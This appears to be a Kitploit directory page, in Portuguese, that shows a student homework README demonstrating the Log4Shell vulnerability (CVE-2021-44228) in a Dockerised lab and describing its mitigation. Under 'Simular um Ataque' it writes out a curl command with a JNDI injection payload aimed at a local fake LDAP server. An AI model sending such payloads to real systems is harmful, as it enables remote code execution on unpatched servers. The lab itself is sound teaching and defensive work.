Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4shell-homework9 — Demonstração de exploração do Log4Shell (CVE-2021-44228) para SEAS 8405. Inclui um aplicativo Spring Boot vulnerável, servidor LDAP falso, configuração Docker, mapeamento MITRE, resposta a incidentes e uma gravação completa de tela. | Kitploit
Ferramentas/GitHubGitHub/serpilrivas/log4shell-homework9
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoResposta a IncidentesLabs e Prática
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

Demonstração de exploração do Log4Shell (CVE-2021-44228) para SEAS 8405. Inclui um aplicativo Spring Boot vulnerável, servidor LDAP falso, configuração Docker, mapeamento MITRE, resposta a incidentes e uma gravação completa de tela.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

Trabalho de Casa 9 – Protegendo Sistemas Contra Explorações Log4Shell

Visão Geral

Este projeto demonstra a exploração e mitigação da vulnerabilidade Log4Shell (CVE-2021-44228) usando uma aplicação web Java em Docker com Log4j 2.14.1 vulnerável. A configuração também inclui um servidor LDAP malicioso simulado para demonstrar o caminho de ataque de injeção JNDI.

Após a exploração, o sistema é fortalecido atualizando o Log4j, validando a entrada e aplicando as recomendações MITRE D3FEND e ATT&CK.


Estrutura de Pastas

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

Como Executar

1. Construir a Aplicação Java (com Log4j vulnerável)

root@kitploit:~
docker build -t vulnerable-app .

2. Executar a Aplicação com Docker Compose

root@kitploit:~
docker-compose up

A aplicação estará disponível em:
http://localhost:8080

3. Iniciar o Servidor LDAP Falso (em um novo terminal)

root@kitploit:~
python3 ldap_server.py

4. Simular um Ataque

Envie uma requisição como esta para a aplicação:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

O servidor LDAP deve receber a requisição (isso simula o ataque JNDI).


Como foi Fortalecido

Após demonstrar o ataque, o sistema foi protegido por:

  • Atualizar o Log4j para a versão 2.17.0
  • Validação de entrada (bloqueando padrões ${jndi:...})
  • Desabilitar lookups de mensagens na configuração
  • Isolamento Docker para limitar o escopo
  • Técnicas MITRE D3FEND e ATT&CK aplicadas

Mapeamento MITRE

MITRE ATT&CK:

  • T1190: Exploração de Aplicação Exposta ao Público
  • T1210: Exploração de Serviços Remotos

MITRE D3FEND:

  • D3-IA: Validação de Entrada
  • D3-HI: Detecção de Intrusão Baseada em Host
  • D3-DA: Desabilitar Funcionalidades Inseguras

Relatório

Veja mitigation_report.pdf para:

  • Arquitetura do sistema antes/depois
  • Explicação do Log4Shell
  • Estratégia de mitigação
  • Plano de resposta a incidentes

Gravação de Tela

Se o vídeo não for enviado diretamente, ele está disponível no link do relatório.


Autor

Serpil Rivas
SEAS 8405 – Arquiteturas de Cibersegurança
Maio de 2025

Baixar ferramenta